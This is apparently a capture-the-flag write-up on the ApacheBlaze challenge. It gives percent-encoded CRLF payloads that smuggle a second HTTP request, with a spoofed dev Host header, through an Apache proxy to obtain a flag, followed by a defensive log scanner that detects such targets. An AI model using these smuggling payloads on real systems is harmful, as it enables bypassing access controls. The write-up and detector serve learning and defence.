
ApacheBlaze

```python
# Excerpt from the challenge's Flask handler: the game name is taken from the
# request, and the flag is returned only when X-Forwarded-Host carries the dev hostname.
elif game == 'click_topia':
    if request.headers.get('X-Forwarded-Host') == 'dev.apacheblaze.local':
        return jsonify({
            'message': f'{app.config["FLAG"]}'
        }), 200
    else:
        return jsonify({
            'message': 'This game is currently available only from dev.apacheblaze.local.'
        }), 200
```

According to the source code, I added `X-Forwarded-Host: dev.apacheblaze.local` to the request headers. But it didn't work. So I decided to deploy the source code locally in a Docker container.

```shell
$ python -m venv .venv
$ source .venv/bin/activate

$ chmod +x build_docker.sh
$ ./build_docker.sh
```

Internal HTTP Request Smuggling via Header Injection

```text
# POC
 HTTP/1.1\r\nHost: localhost\r\n\r\nGET /SMUGGLED
%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED
```


```text
# Reminder for encoding:

\r\n     ->  %0d%0a
\r\n\r   ->  %0d%0a%0d
```

```text
# tailor to fit
 HTTP/1.1\r\nHost: dev.apacheblaze.local\r\n\r\nGET 
%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20

%20HTTP/1.1%0D%0AHost:%20dev.apacheblaze.local%0D%0A%0D%0AGET%20
```
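From the defender's side, the same encoding trick is easy to spot: a request target can never legitimately contain a CR or LF, so a percent-encoded `%0d`/`%0a` in the logged request line, and especially a decoded target that holds a second request line with its own `Host:` header, is a smuggling attempt like the one above. The following is an added example (not part of the original writeup or the challenge code) that scans Apache combined-format access log lines for this pattern. The log lines, the route path `/api/games/click_topia` and the function names are constructed assumptions, not taken from the page.

```python
"""Flag CRLF-injected request targets (smuggled request lines) in Apache access logs.

Added example for the writeup above; the log lines below are constructed and the
route path /api/games/click_topia is assumed, not quoted from the challenge.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: client ident user [time] "METHOD target PROTO" status size ...
_COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Percent-encoded CR or LF (either hex case) has no legitimate use in a target.
_ENCODED_CRLF = re.compile(r'%0[dDaA]')

# After decoding, "... HTTP/1.1\r\n" inside the target means a request line was
# injected, i.e. the client is trying to terminate the proxied request early.
_EMBEDDED_REQUEST_LINE = re.compile(r'\sHTTP/1\.[01]\r?\n', re.IGNORECASE)

# A Host header following an injected line break: the backend would see this
# value (or a forwarded copy of it) instead of the real client's Host.
_INJECTED_HOST = re.compile(r'\nHost:\s*([^\r\n]+)', re.IGNORECASE)


def classify_target(raw_target: str) -> list:
    """Return the findings for one raw (still percent-encoded) request target."""
    findings = []
    if _ENCODED_CRLF.search(raw_target):
        findings.append('encoded-crlf')
    decoded = unquote(raw_target)
    if '\r' in decoded or '\n' in decoded:
        if _EMBEDDED_REQUEST_LINE.search(decoded):
            findings.append('embedded-request-line')
        host = _INJECTED_HOST.search(decoded)
        if host:
            findings.append('injected-host=' + host.group(1).strip())
    return findings


def scan_access_log(lines) -> list:
    """Return (client, raw_target, findings) for every line whose target is suspicious."""
    hits = []
    for line in lines:
        m = _COMBINED.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = classify_target(m.group('target'))
        if findings:
            hits.append((m.group('client'), m.group('target'), findings))
    return hits


# Constructed sample: one ordinary request and one carrying the encoded payload
# from the writeup appended to the (assumed) game route.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] '
    '"GET /api/games/click_topia HTTP/1.1" 200 73 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:57:01 +0000] '
    '"GET /api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local'
    '%0d%0a%0d%0aGET%20 HTTP/1.1" 200 52 "-" "curl/8.1.2"',
]

if __name__ == '__main__':
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(f'{client}: {findings}\n    target={target!r}')
```

Running it prints only the second line, tagged `encoded-crlf`, `embedded-request-line` and `injected-host=dev.apacheblaze.local`. The decoded-target check matters because a proxy may log the target before or after decoding depending on configuration; matching on both the raw `%0d%0a` and the decoded CR/LF covers either case. The underlying fix is on the proxy, where a rewrite target must never be built from unvalidated request data, and on the backend, which should not treat a forwarded host header as an authorization signal.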
